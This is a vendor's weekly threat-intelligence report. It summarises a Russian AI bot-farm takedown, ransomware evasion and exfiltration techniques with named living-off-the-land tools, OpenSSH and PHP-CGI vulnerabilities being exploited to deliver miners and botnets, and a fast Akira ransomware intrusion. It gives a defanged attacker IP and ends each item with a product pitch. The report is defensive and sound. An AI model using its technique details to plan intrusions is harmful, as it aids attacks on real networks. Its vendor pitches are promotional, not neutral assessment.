Vercara’s Open-Source Intelligence (OSINT) Report – July 5 – July 11, 2024

U.S. seizes domains used by AI-powered Russian bot farm for disinformation.  

(TLP: CLEAR) On July 9, a joint advisory from government agencies in the US, Canada, and the Netherlands revealed that the Russian state-sponsored media organization RT, formerly known as Russia Today, has been employing an artificial intelligence (AI)-powered tool dubbed “Meliorator”. Recent intelligence reporting reveals that the bot farm (large collection of bots) fuelling the Russian disinformation campaign has been dismantled in the latest U.S. Department of Justice (DoJ) cyber operation. The tool in question has been used over the past two years to construct convincing social media personas in order to spread disinformation and propaganda using AI-powered social media bots. The bot farm targeted the US and several other countries, utilizing fraudulent online personas disguised as legitimate users to disseminate pro-Kremlin messages. According to reporting, the bots were assigned three specific tasks: to disseminate pro-Russian political ideologies, to engage with other bot generated messages, and to spread propaganda and misinformation from both automated and human sources. Investigators revealed that the tool incorporates an admin panel named “Brigadir” and a backend application called Taras, which manages the realistic-looking accounts. These accounts utilize profile pictures and biographical details generated through an open-source program called Faker. Finally, further analysis provided by the DoJ revealed that this threat actor intends to enhance Meliorator’s capabilities to target additional major social media platforms.  

(TLP: CLEAR) Comments: The recent DoJ takedown highlights the increasingly sophisticated tactics of state-sponsored disinformation campaigns and the escalating role of AI in these operations. Additionally, the capability to generate a multitude of realistic personas that convincingly mimic genuine users poses a substantial challenge for social media platforms in terms of detection and mitigation. The aforementioned highlights the necessity for stricter verification processes for user accounts, including multi-factor authentication and enhanced AI algorithms to detect bot behaviour more effectively. 

(TLP: CLEAR) Recommended best practices/regulations: National Institute of Standards and Technology AI-600, “Artificial Intelligence Risk 5 Management Framework: 6 Generative Artificial Intelligence 7 Profile”:  “Identify potential content provenance risks and harms in GAI, such as misinformation or disinformation, deepfakes, including NCII, or tampered content. Enumerate and rank risks and/or harms based on their likelihood and potential impact, and determine how well provenance solutions address specific risks and/or harms.” 

(TLP: CLEAR) Vercara: Vercara’s UltraAPI Bot Manager leverages a powerful analytics engine that uses multi-dimensional machine learning techniques and draws from the largest API threat database in the world. It analyzes API and web application requests across your network to detect malicious bot activity, making it effective and adaptable. 

Source: https://www.ic3.gov/Media/News/2024/240709.pdf  

Source: https://www.securityweek.com/us-disrupts-ai-powered-russian-bot-farm-on-x/ 

Source: https://www.justice.gov/opa/pr/justice-department-leads-efforts-among-federal-international-and-private-sector-partners  

Ransomware groups prioritize defence [sic] evasion for data exfiltration. 

(TLP: CLEAR) Recent reporting reveals ransomware groups are leveraging sophisticated defence evasion techniques to maintain a prolonged presence within targeted compromised networks. Investigators have indicated that this shift is likely driven by the double-extortion ransomware model, wherein attackers exfiltrate sensitive data and threaten its public release in tandem with encrypting the victim’s network and systems. The main objective is to achieve persistent access, allowing attackers to comprehensively map the network, pinpoint critical assets, and identify valuable data for exfiltration. Additionally, these groups have been observed employing various advanced tactics such as disabling and modifying security software, obfuscating malicious code, and manipulating system registries to suppress security alerts. Automated persistence mechanisms and remote access tools are then utilized to maintain control over infected systems. Furthermore, attackers exploit weak access controls and elevate privileges using legitimate system utilities, employing “living-off-the-land” techniques. This includes the use of native tools such as Net, Netsh, Nltest, Certutil and Wevtutil, which blend malicious activities with normal system operations, thereby evading security monitoring tools. Ransomware operators then use compression and encryption tools such as 7-Zip and WinRAR to obscure the exfiltration process, thereby reducing the likelihood of detection by security tools and administrators. Ransomware-as-a-service (RaaS) groups, such as LockBit, further enhance their operations by employing custom data exfiltration tools like StealBit. These advanced tools streamline the exfiltration process, significantly boosting the efficiency and effectiveness of their malicious activities. 

(TLP: CLEAR) Comments: Three vulnerabilities have been identified to have been repeatedly used by ransomware operators in the past. CVE-2020-1472, also known as Zerologon, enables attackers to bypass authentication and escalate privileges within a domain controller’s Active Directory, significantly compromising network integrity. CVE-2018-13379, found in Fortinet’s FortiOS SSL VPN, allows unauthorized access to system files and sensitive information, facilitating lateral movement within the network. Last, CVE-2023-0669, a vulnerability in GoAnywhere Managed File Transfer, allows for remote code execution on the server without requiring authentication, enabling further internal reconnaissance and lateral movement. These vulnerabilities highlight the necessity of timely patching and robust security measures to mitigate potential exploits and maintain network security. 

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency #StopRansomware Guide: “Implement Protective Domain Name System (DNS). By blocking malicious internet activity at the source, Protective DNS services can provide high network security for remote workers. These security services analyze DNS queries and take action to mitigate threats—such as malware, ransomware, phishing attacks, viruses, malicious sites, and spyware—leveraging the existing DNS protocol and architecture.” 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), receives DNS queries from enterprise users and other on-LAN devices and inspects the DNS response for indicators of malicious activity such as phishing, ransomware, and acceptable usage policy violations. 

Source: https://www.infosecurity-magazine.com/news/ransomware-defense-evasion-data/  

OpenSSH vulnerability discovered: Potential remote code execution risk. 

(TLP: CLEAR) Recent reporting has highlighted a new vulnerability, CVE-2024-6409, with a CVSS score of 7.0, that has been identified in OpenSSH versions 8.7p1 and 8.8p1 which are included with Red Hat Enterprise Linux 9 (RHEL 9). Notably, this bug does not affect current versions of RHEL 7 and RHEL 8. CVE-2024-6409 is distinct from the recently disclosed CVE-2024-6387 (RegreSSHion), although both exploit race conditions in signal handling. CVE-2024-6409 specifically targets the unprivileged child process of the SSH daemon (sshd), potentially enabling remote code execution. According to reporting, CVE-2024-6409, requires numerous attempts to exploit due to its reliance on an unpredictable race condition. While CVE-2024-6387 impacts the more privileged parent server process, CVE-2024-6409’s focus on the child process results in a reduced potential impact. Nevertheless, successful exploitation of either could grant attackers a foothold within the targeted network, ultimately leading to lateral movement, privilege escalation, or malware deployment via remote code execution. Currently, there have been no incidents of active exploitation for CVE-2024-6409 although some reports indicate that an unidentified threat actor has been exploiting CVE-2024-6387, targeting some unnamed servers in China. Furthermore, both vulnerabilities were discovered simultaneously, but the announcement of CVE-2024-6409 was postponed as Red Hat was already preparing a patch for CVE-2024-6387. As a result, all versions of RHEL 9 received patches for CVE-2024-6387 by July 8, 2024, while CVE-2024-6409 remains unpatched in RHEL 9 at this present moment. 

(TLP: CLEAR) Comments: The source IP observed in the initial attack, 108.174.58[.]28, hosts a repository of exploit tools designed for automating the exploitation of vulnerable SSH servers. The use of CVE-2024-6387 in these attacks suggests the involvement of Malware-as-a-Service (MaaS), indicating that with little effort, even low-skill attackers could potentially exploit these OpenSSH vulnerabilities. It is advised that the organization’s security policy includes routine reviews of all IT infrastructure, including applications, to ensure they are up to date with the latest security patches. If no security patches are being released for known vulnerabilities, organizations should look at either replacing outdated systems or establishing extra security-in-depth measures to protect non-updated systems. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”   

By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users.  This can be done via a protective DNS or forward web proxy solution with website category feeds. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them. 

Source: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html 

Source: https://www.blackhatethicalhacking.com/news/new-openssh-vulnerability-cve-2024-6409-exposes-systems-to-remote-code-execution-risks/  

PHP vulnerability exploited to spread malware and launch DDoS attacks. 

(TLP: CLEAR) Recent intelligence reporting sheds light on multiple threat actors actively exploiting a newly identified PHP vulnerability to deploy various malware strains to targeted systems. Currently being tracked as CVE-2024-4577, this high-severity vulnerability is a PHP-CGI OS Command Injection bug that allows attackers to remotely execute malicious commands on Windows operating systems. According to researchers, threat actors leverage specific character sequences to bypass command-line restrictions and pre-established security measures, allowing them to pass arguments directly through PHP. This allows for the execution of arbitrary code on remote PHP servers, ultimately granting the threat actor control over compromised systems. Additionally, investigators reported that within just 24 hours of the PHP vulnerability becoming public, honeypot servers—specifically designed to capture malicious activity—detected a surge of exploit attempts. These attempts intended to deploy a range of malware, including the remote access trojan Gh0st RAT, cryptocurrency miners like RedTail and XMRig, and the distributed denial of service (DDoS) botnet Muhstik. This rapid response by threat actors highlights the determination of cybercriminals in leveraging newly disclosed vulnerabilities in order to infiltrate and compromise systems. It was later stressed that users and organizations to promptly update their PHP installations to the latest version.  

(TLP: CLEAR) Comments: The Muhstik DDoS botnet and the XMRig cryptocurrency miner both attempt to exploit CVE-2024-4577. Muhstik deploys a shell script that downloads an ELF file named “pty3” from a separate IP address, likely a variant of Muhstik malware designed to target Internet of Things (IoT) devices and Linux servers DDoS attacks. XMRig gets executed from a script from a remote mining pool and subsequently removes temporary files to obfuscate the attack. 

(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Security Top 10 A03:2021 – Injection: “An application is vulnerable to attack when:   

• “User-supplied data is not validated, filtered, or sanitized by the application.  

• “Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.  

• “Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.  

• “Hostile data is directly used or concatenated. The SQL or command contains the structure and malicious data in dynamic queries, commands, or stored procedures.” 

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, equips your company with adaptable security features to counteract the most significant network and application-layer threats, including SQL injection, XSS, and DDoS attacks. Its always-on security posture, combined with cloud-based scalability, ensures comprehensive protection against the OWASP top 10, advanced bot management, and vulnerability scanning, allowing you to effectively shield your critical and customer-facing applications from emerging threats. 

Source: https://thehackernews.com/2024/07/php-vulnerability-exploited-to-spread.html 

Source: https://www.bankinfosecurity.com/multiple-threat-actors-moving-quickly-to-exploit-php-flaw-a-25748 

Source: https://thehackernews.com/2024/06/muhstik-botnet-exploiting-apache.html  

Akira Ransomware: Lightning-fast data exfiltration in 2 hours. 

(TLP: CLEAR) The Akira ransomware group, renowned for its swift data exfiltration prowess, recently conducted a highly efficient attack on a Latin American airline, managing to harvest sensitive data in just over two hours. According to recent reporting, the incident involved the threat actor group Storm-1567, also dubbed as “Punk Spider” and “Gold Sahara”. The group gained initial access through an unpatched Veeam backup server via the SSH protocol. Once inside the targeted network, they rapidly exfiltrated critical data before deploying the Akira ransomware the following day. Recent intelligence reporting has indicated that since March 2023, Storm-1567 has employed a double-extortion model, successfully attacking over 250 organizations worldwide. While predominantly targeting Windows operating systems, the group has also developed Linux and VMware ESXi variants. In their latest cyber assault, the group exploited an unpatched Veeam backup server, likely leveraging CVE-2023-27532, to gain initial access. Once inside, they swiftly began data exfiltration, capitalizing on the wealth of data stored on the victim’s server. The initial data exfiltration was executed in a mere 133 minutes, utilizing legitimate tools such as Advanced IP Scanner and WinSCP for reconnaissance and data extraction. Following the data exfiltration, reports indicate that the hacker group ceased their activities for the day, likely indicating at a possible operational base in Western Europe, as suggested by investigators analysing the traffic patterns. The following day, the group resumed their attack, penetrating deeper into the network to deploy the ransomware payload. They systematically conducted user verifications on several machines before accessing the primary Veeam backup server. From this control point, Storm-1567 orchestrated the deployment of Akira ransomware across multiple hosts within the compromised environment.  

(TLP: CLEAR) Comments: The methodical approach executed by the Storm-1567 group underscores the sophisticated and organized nature of their operational prowess. Their ability to swiftly navigate through systems and leverage legitimate tools for malicious purposes highlights the critical need for robust cybersecurity defences and vigilant patch management to thwart such advanced persistent threats. 

(TLP: CLEAR) Recommended best practices/regulations: OWASP NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”   

By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users.  This can be done via a protective DNS or forward web proxy solution with website categories feeds. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.  

Source: https://www.darkreading.com/endpoint-security/akira-ransomware-lightning-fast-data-exfiltration-2-hours